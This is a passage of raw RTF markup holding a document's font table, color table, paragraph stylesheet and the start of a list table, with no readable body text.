{\f207\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Narrow Tur;}{\f208\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Narrow Baltic;}{\f209\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Bookman Old Style CE;}
{\f210\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Bookman Old Style Cyr;}{\f211\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Bookman Old Style Greek;}
{\f212\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Bookman Old Style Tur;}{\f213\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Bookman Old Style Baltic;}
{\f214\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century Schoolbook CE;}{\f215\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Schoolbook Tur;}
{\f216\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Schoolbook Baltic;}{\f217\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}CG Omega CE;}{\f218\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}CG Omega Tur;}
{\f219\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}CG Omega Baltic;}{\f220\froman\fcharset238\fprq2{\*\panose 00000000000000000000}CG Times CE;}{\f221\froman\fcharset162\fprq2{\*\panose 00000000000000000000}CG Times Tur;}
{\f222\froman\fcharset186\fprq2{\*\panose 00000000000000000000}CG Times Baltic;}{\f223\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Clarendon Condensed CE;}{\f224\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Tur;}
{\f225\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Baltic;}{\f226\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Coronet CE;}{\f227\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Coronet Tur;}
{\f228\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Coronet Baltic;}{\f229\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Garamond CE;}{\f230\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Garamond Cyr;}
{\f231\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Garamond Greek;}{\f232\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Garamond Tur;}{\f233\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Garamond Baltic;}
{\f234\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Letter Gothic CE;}{\f235\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Letter Gothic Tur;}{\f236\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Letter Gothic Baltic;}
{\f237\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Marigold CE;}{\f238\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Marigold Tur;}{\f239\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Marigold Baltic;}
{\f240\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Monotype Corsiva CE;}{\f241\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Cyr;}
{\f242\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Greek;}{\f243\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Tur;}
{\f244\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Baltic;}{\f245\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers CE;}{\f246\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Tur;}
{\f247\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Baltic;}{\f248\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers Condensed CE;}{\f249\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Condensed Tur;}
{\f250\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Condensed Baltic;}{\f251\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Georgia CE;}{\f252\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Georgia Cyr;}
{\f253\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Georgia Greek;}{\f254\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Georgia Tur;}{\f255\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Georgia Baltic;}
{\f256\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Trebuchet MS CE;}{\f257\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Trebuchet MS Tur;}{\f258\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Andale Mono CE;}
{\f259\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Andale Mono Cyr;}{\f260\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Andale Mono Greek;}{\f261\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Andale Mono Tur;}
{\f262\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Andale Mono Baltic;}{\f263\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Western;}
{\f264\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Unicode MS CE;}{\f265\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Cyr;}
{\f266\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Greek;}{\f267\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Tur;}
{\f268\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Hebrew);}{\f269\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Arabic);}
{\f270\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Baltic;}{\f271\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Haettenschweiler CE;}
{\f272\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Haettenschweiler Cyr;}{\f273\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Haettenschweiler Greek;}
{\f274\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Haettenschweiler Tur;}{\f275\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Haettenschweiler Baltic;}{\f276\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}HoratioDMed Tur;}
{\f277\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}@MS Mincho Western;}{\f278\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}@MS Mincho CE;}{\f279\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}@MS Mincho Cyr;}
{\f280\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}@MS Mincho Greek;}{\f281\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}@MS Mincho Tur;}{\f282\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}@MS Mincho Baltic;}
{\f283\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}@SimSun Western;}{\f284\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Charcoal;}{\f285\fnil\fcharset256\fprq2{\*\panose 03020702040506060504}Apple Chancery;}
{\f286\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Aristocrat LET;}{\f287\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bertram LET;}{\f288\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bickley Script LET;}
{\f289\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}BlairMdITC TT-Medium;}{\f290\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni Ornaments ITC TT;}
{\f291\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo ITC TT-Bold;}{\f292\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-Book;}
{\f293\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-BookIta;}{\f294\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo OS ITC TT-Bold;}
{\f295\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-Book;}{\f296\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-BookIt;}
{\f297\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bordeaux Roman Bold LET;}{\f298\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bradley Hand ITC TT-Bold;}{\f299\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Capitals;}
{\f300\fnil\fcharset256\fprq2{\*\panose 020b0806080604040204}Chicago;}{\f301\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Gadget;}{\f302\fnil\fcharset256\fprq2{\*\panose 02030602050506020203}Hoefler Text;}
{\f303\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Hoefler Text Ornaments;}{\f304\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-Light;}
{\f305\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-LightIta;}{\f306\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-MedIta;}
{\f307\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-Medium;}{\f308\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Jokerman LET;}{\f309\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}LunaITC TT-Bold;}
{\f310\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Machine ITC TT;}{\f311\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Mona Lisa Solid ITC TT;}{\f312\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Monaco;}
{\f313\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Palatino;}{\f314\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Party LET;}{\f315\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}PortagoITC TT;}
{\f316\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Sand;}{\f317\fnil\fcharset256\fprq2{\*\panose 020d0502020204020204}Skia;}{\f318\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans ITC TT-Bold;}
{\f319\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-Semi;}{\f320\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-SemiIta;}
{\f321\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans OS ITC TT-Bold;}{\f322\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITC TT-Semi;}
{\f323\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITCTT-SemiIta;}{\f324\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans SC ITC TT-Semi;}{\f325\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Techno;}
{\f326\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Textile;}{\f327\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}TremorITC TT;}{\f328\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Wanted LET;}{\f329\fnil\fcharset256\fprq2 VT100;}
}}}{\colortbl;\red0\green0\blue0;\red0\green0\blue255;\red0\green255\blue255;\red0\green255\blue0;\red255\green0\blue255;\red255\green0\blue0;\red255\green255\blue0;\red255\green255\blue255;\red0\green0\blue128;\red0\green128\blue128;\red0\green128\blue0;
\red128\green0\blue128;\red128\green0\blue0;\red128\green128\blue0;\red128\green128\blue128;\red192\green192\blue192;}{\stylesheet{\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \snext0 Normal;}{\s1\sb240\sa240\keepn\nowidctlpar\outlinelevel0\adjustright
\b\caps\f1\fs32\cgrid \sbasedon0 \snext0 heading 1;}{\s2\sb240\sa240\keepn\nowidctlpar\outlinelevel1\adjustright \b\f1\fs32\cgrid \sbasedon0 \snext0 heading 2;}{\s3\sb240\sa240\keepn\nowidctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid
\sbasedon0 \snext15 heading 3;}{\s4\sb240\sa240\keepn\nowidctlpar\outlinelevel3\adjustright \b\i\f1\cgrid \sbasedon0 \snext0 heading 4;}{\s5\sb40\sa240\sl-240\slmult0\keepn\nowidctlpar\outlinelevel4\adjustright \b\i\f1\fs20\cgrid \sbasedon1 \snext0
heading 5;}{\s6\sb240\sa240\sl-238\slmult0\keepn\nowidctlpar\pvpara\posy0\absh255\dxfrtext130\dfrmtxtx130\dfrmtxty0\outlinelevel5\adjustright \b\caps\f1\fs32\cgrid \sbasedon1 \snext0 heading 6;}{\s7\sa120\keepn\widctlpar\outlinelevel6\adjustright
\b\f1\fs20\cgrid \sbasedon0 \snext0 heading 7;}{\*\cs10 \additive Default Paragraph Font;}{\s15\li288\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 Normal Indent;}{\*\cs16 \additive \fs16\cf2 \sbasedon10 annotation reference;}{
\s17\sa120\nowidctlpar\adjustright \f1\fs20\cf6\cgrid \sbasedon0 \snext17 annotation text;}{\s18\li1296\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext18 \sautoupd toc 4;}{\s19\li864\sa40\nowidctlpar
\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext19 \sautoupd toc 3;}{\s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon21 \snext20 \sautoupd toc 2;}{\s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright
\f1\fs20\cgrid \sbasedon0 \snext21 \sautoupd toc 1;}{\s22\sa120\nowidctlpar\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid \sbasedon0 \snext22 footer;}{\s23\sa120\nowidctlpar\brdrb\brdrs\brdrw15\brsp20 \tqr\tx9936\adjustright \f1\fs20\cgrid
\sbasedon0 \snext23 header;}{\s24\fi-288\li288\sa120\nowidctlpar\tx288\adjustright \f1\fs20\cgrid \sbasedon0 \snext24 List1-Hang;}{\s25\li288\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext24 List1-Indent;}{
\s26\fi-288\li576\sa120\nowidctlpar\tx576\adjustright \f1\fs20\cgrid \sbasedon0 \snext26 List2-Hang;}{\s27\li576\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext26 List2-Indent;}{\s28\fi-288\li864\sa120\nowidctlpar\tx864\adjustright
\f1\fs20\cgrid \sbasedon0 \snext28 List3-Hang;}{\s29\li864\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext28 List3-Indent;}{\s30\li576\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext24 List1-Code;}{
\s31\li576\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \snext0 Normal Code;}{\s32\li1152\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext28 List3-Code;}{\s33\li864\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext26
List2-Code;}{\s34\li432\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext0 Normal Note;}{\s35\li432\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext24 List1-Note;}{\s36\li720\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid
\sbasedon34 \snext26 List2-Note;}{\s37\li1008\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext28 List3-Note;}{\s38\sb120\sa120\nowidctlpar\tqr\tx9936\pvpg\phmrg\posy878\adjustright \f1\fs20\cgrid \sbasedon23 \snext38 banner2;}{
\s39\qc\sb120\sa120\sl240\slmult0\nowidctlpar\tqr\tx9936\pvpg\phmrg\posy878\dxfrtext187\dfrmtxtx187\dfrmtxty187\adjustright \f1\fs20\cgrid \sbasedon23 \snext39 banner1;}{\s40\fi-864\li864\sa120\nowidctlpar\tx432\tx864\adjustright \f1\fs20\cgrid
\sbasedon0 \snext41 Q&A Question-Hang;}{\s41\fi-432\li864\sa120\nowidctlpar\tx864\adjustright \f1\fs20\cgrid \sbasedon0 \snext40 Q&A Answer-Hang;}{\s42\li864\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext41 Q&A Question-Indent;}{
\s43\sa120\sl-72\slmult0\nowidctlpar\adjustright \v\f1\fs20\cgrid \sbasedon0 \snext43 Fix Headings Bug;}{\s44\li864\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext40 Q&A Answer-Indent;}{\s45\li720\sa120\nowidctlpar\adjustright
\b\f2\fs20\cgrid \sbasedon31 \snext45 Ten1-Code;}{\s46\fi-432\li432\sa120\nowidctlpar\tx432\adjustright \f1\fs20\cgrid \sbasedon0 \snext46 Ten1-Hang;}{\s47\li432\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext47 Ten1-Indent;}{
\s48\li576\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext48 Ten1-Note;}{\s49\li1008\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon33 \snext49 Ten2-Code;}{\s50\fi-288\li720\sa120\nowidctlpar\tx288\adjustright \f1\fs20\cgrid
\sbasedon46 \snext50 Ten2-Hang;}{\s51\li720\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon47 \snext51 Ten2-Indent;}{\s52\li720\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon48 \snext52 Ten2-Note;}{
\s53\li1008\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext53 Q&A Answer-Note;}{\s54\li1296\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext54 Q&A Answer-Code;}{\s55\fi-432\li1296\sa120\nowidctlpar\tx1296\adjustright
\f1\fs20\cgrid \sbasedon0 \snext55 Q&A Answer2-Hang;}{\s56\li1008\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext56 Q&A Question-Note;}{\s57\li1296\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext57 Q&A Question-Code;}{
\s58\li1296\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext58 Q&A Answer2-Indent;}{\s59\li1728\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext59 Q&A Answer2-Code;}{\s60\fi-432\li1728\sa120\nowidctlpar\tx1728\adjustright
\f1\fs20\cgrid \sbasedon0 \snext60 Q&A Answer3-Hang;}{\s61\li1440\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon0 \snext61 Q&A Answer2-Note;}{\s62\li1728\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext62 Q&A Answer3-Indent;}{
\s63\li1872\sa120\nowidctlpar\adjustright \i\f1\fs20\cgrid \sbasedon34 \snext60 Q&A Answer3-Note;}{\s64\li2160\sa120\nowidctlpar\adjustright \b\f2\fs20\cgrid \sbasedon31 \snext64 Q&A Answer3-Code;}{\s65\li432\sa120\nowidctlpar\adjustright
\i\f1\fs20\cgrid \sbasedon0 \snext0 Normal-Note;}{\s66\sa120\nowidctlpar\adjustright \f1\fs10\cgrid \sbasedon0 \snext0 half-line;}{\s67\sa120\nowidctlpar\brdrt\brdrs\brdrw15\brsp20 \adjustright \b\f1\fs14\cf1\cgrid \sbasedon0 \snext67 disclaimer;}{
\s68\sb60\sa60\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon69 \snext68 Control Word;}{\s69\fi-2880\li2880\nowidctlpar\tx720\tx2880\tx7200\adjustright \f1\fs20\cgrid \snext69 TC;}{\s70\li432\sa120\nowidctlpar\adjustright \f2\fs16\cgrid
\sbasedon0 \snext70 Code;}{\s71\sa240\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext71 TableLastRow;}{\s72\li432\sa120\nowidctlpar\adjustright \f2\fs20\cgrid \sbasedon0 \snext72 Syntax;}{\s73\sa120\nowidctlpar\adjustright \b\f1\fs20\cgrid
\sbasedon0 \snext73 TableRow;}{\s74\li1440\sb120\sa60\nowidctlpar\adjustright \f1\fs22\cgrid \sbasedon0 \snext74 Body 3;}{\*\cs75 \additive \b\f1\fs20 \sbasedon10 RTF Keyword;}{\s76\qj\sa120\nowidctlpar\tx864\adjustright \f1\fs20\cgrid \sbasedon0 \snext0
First Paragraph;}{\s77\qj\li360\sa60\nowidctlpar\tx864\adjustright \f1\fs20\cgrid \sbasedon76 \snext77 Definition;}{\s78\fi-200\li200\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 table of authorities;}{\s79\sa120\keepn\nowidctlpar
\brdrb\brdrs\brdrw15\brsp20 \adjustright \shading2000 \f1\fs20\cgrid \sbasedon0 \snext79 TableSubHead;}{\s80\sa120\sl-120\slmult0\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext80 TableSpace;}{\s81\nowidctlpar\adjustright \f1\fs20\cgrid \snext81
Nothing;}{\*\cs82 \additive \fs20 \sbasedon10 Comment;}{\s83\sa240\nowidctlpar\adjustright \f1\fs48\cgrid \snext83 TP;}{\s84\sb240\sa60\nowidctlpar\adjustright \f1\fs22\cgrid \sbasedon0 \snext84 Body 1;}{\*\cs85 \additive \fs20\super \sbasedon10
footnote reference;}{\s86\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext86 footnote text;}{\*\cs87 \additive \fs20 \sbasedon10 page number;}{\s88\sb240\sa60\nowidctlpar\adjustright \b\f1\fs48\cgrid \sbasedon0 \snext88 Title;}{
\s89\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 6;}{\s90\sb120\sa120\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon0 \snext0 caption;}{\s91\sb60\sa120\nowidctlpar\adjustright \cbpat9 \f31\fs20\cgrid
\sbasedon0 \snext91 Document Map;}{\s92\fi-200\li200\sb60\sa120\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 1;}{\s93\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext93 \sautoupd List Bullet;}{
\s94\li1728\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 5;}{\s95\li1200\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 7;}{\s96\li1400\sb60\sa60\nowidctlpar\adjustright
\f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 8;}{\s97\li1600\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd toc 9;}{\s98\sb240\sl199\slmult1\keepn\nowidctlpar\brdrbtw\brdrs\brdrw15 \adjustright \b\f1\fs20\cgrid
\sbasedon0 \snext98 Table Header;}{\s99\sb60\sa60\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon0 \snext99 my control word;}{\s100\fi-200\li400\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 2;}{
\s101\fi-200\li600\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 3;}{\s102\fi-200\li800\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 4;}{
\s103\fi-200\li1000\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 5;}{\s104\fi-200\li1200\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 6;}{
\s105\fi-200\li1400\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 7;}{\s106\fi-200\li1600\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 8;}{
\s107\fi-200\li1800\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext0 \sautoupd index 9;}{\s108\sb60\sa60\nowidctlpar\adjustright \f1\fs20\cgrid \sbasedon0 \snext92 index heading;}{\s109\widctlpar\adjustright
\fs20\loch\af2\hich\af2\dbch\f28\cgrid \sbasedon0 \snext109 Plain Text;}{\*\cs110 \additive \ul\cf2 \sbasedon10 Hyperlink;}{\*\cs111 \additive \ul\cf2 \sbasedon10 FollowedHyperlink;}{\s112\widctlpar\jclisttab\tx360\ls9\adjustright
\loch\af0\hich\af0\dbch\f28\cgrid \sbasedon0 \snext112 EnumList;}{\*\cs113 \additive \f1\fs20\cf1 \sbasedon10 emailstyle15;}{\*\cs114 \additive \f1\fs20\cf9 \sbasedon10 RTABOADA;}{\s115\sa120\nowidctlpar\adjustright \f31\fs16\cgrid \sbasedon0 \snext115
Balloon Text;}{\s116\sa120\nowidctlpar\adjustright \b\f1\fs20\cgrid \sbasedon17 \snext17 Comment Subject;}}{\*\listtable{\list\listtemplateid-438671200\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext
\'02\'00.;}{\levelnumbers\'01;}\fi-360\li1800\jclisttab\tx1800 }{\listname ;}\listid-132}{\list\listtemplateid1977882010\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}
\fi-360\li1440\jclisttab\tx1440 }{\listname ;}\listid-131}{\list\listtemplateid196762532\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li1080\jclisttab\tx1080
}{\listname ;}\listid-130}{\list\listtemplateid10808288\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li720\jclisttab\tx720 }{\listname ;}\listid-129}
{\list\listtemplateid-2012342494\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1800\jclisttab\tx1800 }{\listname ;}\listid-128}
{\list\listtemplateid1140855682\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1440\jclisttab\tx1440 }{\listname ;}\listid-127}
{\list\listtemplateid-2080875312\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1080\jclisttab\tx1080 }{\listname ;}\listid-126}
{\list\listtemplateid-1582808918\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li720\jclisttab\tx720 }{\listname ;}\listid-125}
{\list\listtemplateid674782002\listsimple{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360\jclisttab\tx360 }{\listname ;}\listid-120}{\list\listtemplateid696671516
\listsimple{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li360\jclisttab\tx360 }{\listname ;}\listid-119}{\list\listtemplateid1679699710\listsimple
{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat0\levelspace0\levelindent0{\leveltext\'01*;}{\levelnumbers;}}{\listname ;}\listid-2}{\list\listtemplateid-1273221934{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat255\levelspace0
\levelindent0{\leveltext\'01\'00;}{\levelnumbers\'01;}\fbias0 \fi-480\li840\jclisttab\tx840 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'01.;}{\levelnumbers\'01;}\fi-360\li1440\jclisttab\tx1440 }
{\listlevel\levelnfc2\leveljc2\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'02.;}{\levelnumbers\'01;}\fi-180\li2160\jclisttab\tx2160 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext
\'02\'03.;}{\levelnumbers\'01;}\fi-360\li2880\jclisttab\tx2880 }{\listlevel\levelnfc4\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'04.;}{\levelnumbers\'01;}\fi-360\li3600\jclisttab\tx3600 }{\listlevel\levelnfc2\leveljc2
\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'05.;}{\levelnumbers\'01;}\fi-180\li4320\jclisttab\tx4320 }{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\'02\'06.;}{\levelnumbers\'01;}
